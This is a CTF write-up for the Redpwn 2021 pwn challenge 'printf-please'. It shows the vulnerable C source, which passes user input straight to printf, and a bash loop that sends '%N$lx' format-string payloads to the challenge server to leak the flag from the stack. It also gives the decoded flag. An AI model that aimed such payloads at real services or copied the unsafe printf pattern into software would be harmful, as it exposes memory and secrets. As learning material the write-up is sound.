## printf-please

* **CTF:** Redpwn CTF 2021
* **Category:** pwn
* **Points:** 108
* **Author(s):** b0uldrr
* **Date:** 10/07/21

---

### Challenge
```
Be sure to say please...
nc mc.ax 31569
```

### Downloads
* [please.c](please.c)
* [please](please)

---

### Solution

The vulnerable program opens the flag file and stores the flag contents in memory on the stack. It then asks for usr input and reads it into local variable `buffer`, before passing `buffer` directly to a `printf(buffer)` call. The program does check that the first 6 characters of `buffer` are "please" but after that we can fill it with whatever we want.

This program is vulnerable to a stack exposure. If we fill the `buffer` variable with `%x` characters these will be passed directly to `printf()` which will leak stack values, including the flag which is stored on the stack.

This one tripped me up for a little bit until I realised that the program was compiled as a 64-bit ELF and `%x` only grabs 4 bytes at a time, but will then skip to the next 8 bytes in memory. No matter how many `%x`'s I would feed into the buffer, I would only get about half of the flag out. When dealing with 64-bit memory, we need to leak it with `%lx` (and maybe `%llx`?).

`please.c` source:
```c
#include <stdio.h>
#include <fcntl.h>

int main(void)
{
  char buffer[0x200];
  char flag[0x200];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  memset(buffer, 0, sizeof(buffer));
  memset(flag, 0, sizeof(flag));

  int fd = open("flag.txt", O_RDONLY);
  if (fd == -1) {
    puts("failed to read flag. please contact an admin if this is remote");
    exit(1);
  }

  read(fd, flag, sizeof(flag));
  close(fd);

  puts("what do you say?");

  read(0, buffer, sizeof(buffer) - 1);
  buffer[strcspn(buffer, "\n")] = 0;

  if (!strncmp(buffer, "please", 6)) {
    printf(buffer);
    puts(" to you too!");
  }
}
```

I worte a bash script to check each memory address on the stack. By calling `%70$lx` we can print the 70th memory address on the stack directly, without having to print the previous 69 memory addresses. It's just neater. Remeber that the program checks that the first 6 bytes in `buffer` are "please":

```bash
for i in {1..200}
do
echo $i.
echo please%$i\$lx | nc mc.ax 31569
echo
done
```

Memory addresses 70 - 74 seem to be leaking ASCII values...
```
70.
what do you say?
please336c707b67616c66 to you too!

71.
what do you say?
please6e3172705f337361 to you too!

72.
what do you say?
please5f687431775f6674 to you too!

73.
what do you say?
please5f6e303174756163 to you too!

74.
what do you say?
pleasea7d6c78336139 to you too!
```

Extract the values:
```
336c707b67616c66
6e3172705f337361
5f687431775f6674
5f6e303174756163
a7d6c78336139
```

Convert from little endianess:
```
66 6c 61 67 7b 70 6c 33
61 73 33 5f 70 72 31 6e
74 66 5f 77 31 74 68 5f
63 61 75 74 31 30 6e 5f
39 61 33 78 6c 7d
```

Dump the result into [Rapid Tables Hex to ASCII converter](https://www.rapidtables.com/convert/number/hex-to-ascii.html):
![flag](images/flag.png)


---

### Flag 
```
flag{pl3as3_pr1ntf_w1th_caut10n_9a3xl}
```
